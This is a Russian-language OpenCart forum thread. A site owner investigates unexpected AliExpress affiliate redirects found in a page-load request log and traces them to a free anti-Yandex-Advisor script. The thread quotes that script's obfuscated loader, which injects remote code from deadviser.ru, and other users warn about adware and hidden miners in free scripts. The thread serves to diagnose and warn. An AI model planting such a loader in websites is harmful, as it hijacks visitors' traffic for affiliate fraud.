Jump to content
Search In
  • More options...
Find results that contain...
Find results in...

Вирус? ALIEXPRESS


Recommended Posts

Добрый день всем.
Гонял сайт через  сервис http://www.webpagetest.org

 

и заметил, среди запросов, странные ведущие на ALIEXPRESS  И com-sale.ru

https://yadi.sk/i/Nhiz-49D3QpYV5

Спойлер

 


+ Request 176: https://passport.alibaba.com/jump.htm?toURL=http%3A%2F%2Fs.click.aliexpress.com%2Fe%2FZJmQJiA
- Request 177: http://s.click.aliexpress.com/e/ZJmQJiA
URL: http://s.click.aliexpress.com/e/ZJmQJiA
Host: s.click.aliexpress.com
IP: 104.81.62.228
Error/Status Code: 302
Priority: VeryHigh
Protocol: http/1.1
Initiated By: http://com-sale.ru/page/index.php?id=1 line 0
Client Port: 42588
Request Start: 10.142 s
DNS Lookup: 30 ms
Initial Connection: 29 ms
Time to First Byte: 279 ms
Bytes In (downloaded): 0.0 KB
Bytes Out (uploaded): 0.9 KB
Request Headers:

GET /e/ZJmQJiA HTTP/1.1
Host: s.click.aliexpress.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36 PTST/171219.181244
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ali_apache_id=10.83.238.12.1513854934920.174641.2; xman_us_f=x_l=0&x_locale=ru_RU; intl_locale=ru_RU; aep_usuc_f=region=RU&site=rus&b_locale=ru_RU&c_tp=RUB; xman_t=F9YbP/lSCzgPr+7ppBEF+LMx+SGa5SQswoo5fpnHSrcP2Ae/Ns90QGmajS+8v961; acs_usuc_t=acs_rt=39c776d7ef5a4ff9bfe8539e248a54f5; intl_common_forever=EHsqcZ9jWDOZwDyDP7U0y0b/waIXjuzZs4YilNI2JzEpjgrgjR7RfA==; xman_f=tA8OW6neH5aj7dRBKZslhg8SKBFHmiy6pvtOJI6LHYID8bYPYMCpBL8hgJdIUypUuXO6GcNYYay81csJPG5KTC+aYpBpDIYyjDbxv+NmZTXmcJXEdmpYaw==
Response Headers:

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
P3P: CP="CAO PSA OUR"
X-Application-Context: affiliateclick:prod,production:7001
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
Location: http://ru.aliexpress.com/af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5
Content-Language: en-US
Server: Tengine/Aserver
Timing-Allow-Origin: *
Date: Thu, 21 Dec 2017 11:15:36 GMT
Connection: keep-alive
Set-Cookie: xman_us_f=x_locale=ru_RU&x_l=0&x_as_i=%7B%22cv%22%3A%221%22%2C%22tp1%22%3A%22comsale%22%2C%22src%22%3A%22promotion%22%2C%22af%22%3A842956180%2C%22cpt%22%3A1513854936600%2C%22channel%22%3A%22AFFILIATE%22%2C%22affiliateKey%22%3A%22ZJmQJiA%22%2C%22cn%22%3A%2210004940010%22%2C%22tagtime%22%3A1513854936606%2C%22vd%22%3A%2230%22%7D; Domain=.aliexpress.com; Expires=Tue, 08-Jan-2086 14:29:43 GMT; Path=/
Set-Cookie: acs_usuc_t=x_csrf=dylis5otzb08&acs_rt=39c776d7ef5a4ff9bfe8539e248a54f5; Domain=.aliexpress.com; Path=/
Set-Cookie: aeu_cid=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA; Domain=.aliexpress.com; Expires=Tue, 08-Jan-2086 14:29:43 GMT; Path=/
- Request 178: http://ru.aliexpress.com/af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5
URL: http://ru.aliexpress.com/af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5
Host: ru.aliexpress.com
IP: 104.81.232.172
Error/Status Code: 301
Priority: VeryHigh
Protocol: http/1.1
Initiated By: http://com-sale.ru/page/index.php?id=1 line 0
Client Port: 48324
Request Start: 10.452 s
Time to First Byte: 212 ms
Bytes In (downloaded): 0.3 KB
Bytes Out (uploaded): 1.6 KB
Request Headers:

GET /af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5 HTTP/1.1
Host: ru.aliexpress.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36 PTST/171219.181244
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ali_apache_id=10.83.238.12.1513854934920.174641.2; JSESSIONID=3Q2KZA0W-TJ3RYODNMH5ABTJ7KWCM1-NP35EGBJ-2H; intl_locale=ru_RU; aep_usuc_f=region=RU&site=rus&b_locale=ru_RU&c_tp=RUB; xman_t=F9YbP/lSCzgPr+7ppBEF+LMx+SGa5SQswoo5fpnHSrcP2Ae/Ns90QGmajS+8v961; intl_common_forever=EHsqcZ9jWDOZwDyDP7U0y0b/waIXjuzZs4YilNI2JzEpjgrgjR7RfA==; xman_f=tA8OW6neH5aj7dRBKZslhg8SKBFHmiy6pvtOJI6LHYID8bYPYMCpBL8hgJdIUypUuXO6GcNYYay81csJPG5KTC+aYpBpDIYyjDbxv+NmZTXmcJXEdmpYaw==; _mle_tmp0=eNrz4A12DQ729PeL9%2FV3cfUxiKjOTLFSMg408o5yNAjXDfEyDor0d%2FHz9TB1dArxMvcOd%2FY11PULMDZ1dXfy0jXyUNJJLrEyNDU0tjA1sTQ2NTA11ElMRhPIrbAyqI0CAP7gG7k%3D; xman_us_f=x_locale=ru_RU&x_l=0&x_as_i=%7B%22cv%22%3A%221%22%2C%22tp1%22%3A%22comsale%22%2C%22src%22%3A%22promotion%22%2C%22af%22%3A842956180%2C%22cpt%22%3A1513854936600%2C%22channel%22%3A%22AFFILIATE%22%2C%22affiliateKey%22%3A%22ZJmQJiA%22%2C%22cn%22%3A%2210004940010%22%2C%22tagtime%22%3A1513854936606%2C%22vd%22%3A%2230%22%7D; acs_usuc_t=x_csrf=dylis5otzb08&acs_rt=39c776d7ef5a4ff9bfe8539e248a54f5; aeu_cid=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA
Response Headers:

HTTP/1.1 301 Moved Permanently
Content-Type: text/html
Content-Length: 286
Location: https://ru.aliexpress.com/af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5
Server: Tengine/Aserver
Timing-Allow-Origin: *
Date: Thu, 21 Dec 2017 11:15:36 GMT
Connection: keep-alive
+ Request 179: https://ru.aliexpress.com/af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5
+ Request 180: https://mc.yandex.ru/webvisor/25275842?wmode=0&rn=486342043&page-url=https%3A%2F%2F1mango.ru%2F&wv-type=2&wv-hit=585454435&wv-part=1&browser-info=ti%3A8%3Aet%3A1513854936%3Av%3A929%3Az%3A60%3Ai%3A20171221121534%3Ast%3A1513854937%3Au%3A1513854934737472983
+ Request 181: https://ru.aliexpress.com/af/category/202000020.html?sk=ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5&cpt=1513854936600&blanktest=0&origin=n&jump=afs&aff_platform=promotion&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&CatId=202000020&catName=consumer-electronics

 

 

Edited by kolek5520
Link to comment
Share on other sites


5 минут назад, Shureg сказал:

Еще один сайт с варезом? Другой причины так тщательно скрывать ссылку на него не вижу. 

зря вы так, у меня не одного варезного модуля или темы нету - все до единого куплены. А ссылки не вставляю,т.к. в своё время подобная ссылка была проиндексироанная  и по запросу моего сайта в поиске вылазила ссылка на этот форум с разбором тех или иных проблем. 

https://yadi.sk/i/9F81yE0H3Qpf4q - не считая покупок на https://https://opencartforum.com/files// и https://www.opencart.com/

Link to comment
Share on other sites


15 минут назад, Shureg сказал:

Еще один сайт с варезом? Другой причины так тщательно скрывать ссылку на него не вижу. 

Кстати зря вы так, @kolek5520 лояльный пользователь и не замечен в варезе
Просто сейчас часто втихаря ломают сайты и всовывают adware, скрытые майнеры, и другую разную фигню
Даже разные дискусы и тп всовывают разную хрень
Это как эпидемия

  • +1 1
Link to comment
Share on other sites

17 минут назад, kolek5520 сказал:

зря вы так, у меня не одного варезного модуля или темы нету - все до единого куплены. А ссылки не вставляю,т.к. в своё время подобная ссылка была проиндексироанная  и по запросу моего сайта в поиске вылазила ссылка на этот форум с разбором тех или иных проблем. 

https://yadi.sk/i/9F81yE0H3Qpf4q - не считая покупок на https://https://opencartforum.com/files// и https://www.opencart.com/

Прошу прощения за подозрения, рад, что неправ.
Увы, слишком часто "секретность" именно "варезностью" обусловлена. У вас, к тому же, даже на картинке ссылки не найти, а была бы нелишней

Link to comment
Share on other sites


https://developers.google.com/speed/pagespeed/insights тоже ругается на какие то не сжатые картинки с https://ae01.alicdn.com

https://yadi.sk/i/mWeO4CUi3QphH8

В общем кто с этим знаком и может помочь, напишите в личку - не бесплатно конечно

Link to comment
Share on other sites


1 час назад, markimax сказал:

Кстати зря вы так, @kolek5520 лояльный пользователь и не замечен в варезе
Просто сейчас часто втихаря ломают сайты и всовывают adware, скрытые майнеры, и другую разную фигню
Даже разные дискусы и тп всовывают разную хрень
Это как эпидемия

нашел эту заразу. Ставил скрипт против яндекс советника: https://deadviser.ru/

<script type="text/javascript" async> (function () { var j = document.createElement("script"); j.type = "text/javascript"; j.src = "https://"+"deadvi"+"ser.ru/free/?"+Math.random(); document.getElementsByTagName('head')[0].appendChild(j); })(); </script>

убрал, сразу всё норм стало, вернул - сразу https://ae01.alicdn.com полезло.

Так что осторожнее с этим:mellow:

Link to comment
Share on other sites


1 час назад, kolek5520 сказал:

нашел эту заразу. Ставил скрипт против яндекс советника: https://deadviser.ru/


<script type="text/javascript" async> (function () { var j = document.createElement("script"); j.type = "text/javascript"; j.src = "https://"+"deadvi"+"ser.ru/free/?"+Math.random(); document.getElementsByTagName('head')[0].appendChild(j); })(); </script>

убрал, сразу всё норм стало, вернул - сразу https://ae01.alicdn.com полезло.

Так что осторожнее с этим:mellow:

Как я и предполагал

 

Мудаки  одним словом
Написано FREE
А на самом деле Adware

Link to comment
Share on other sites

Ребята, не вставляйте разную "бесплатную" хрень откуда попало
99.9% туда или майнер скрытый засунут, adware или маркетинговую следилку
Относится это ко всему и к разным дискусам и т п
 

Link to comment
Share on other sites

А я отписывал в теме про Яндекс советника тут на форуме, что все чужие скрипты Кик советник и т.д это сегодня помогают Вам, завтра будут против Вас)

Отправлено через Tapatalk

Link to comment
Share on other sites


36 минут назад, pimur сказал:

А я отписывал в теме про Яндекс советника тут на форуме, что все чужие скрипты Кик советник и т.д это сегодня помогают Вам, завтра будут против Вас)

Отправлено через Tapatalk
 

а как быть тогда с этим советником? как его убрать?

Link to comment
Share on other sites


2 часа назад, kolek5520 сказал:

а как быть тогда с этим советником? как его убрать?

Уберите разметку с цены, подмена цены и т.д

Link to comment
Share on other sites


Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

×
×
  • Create New...

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.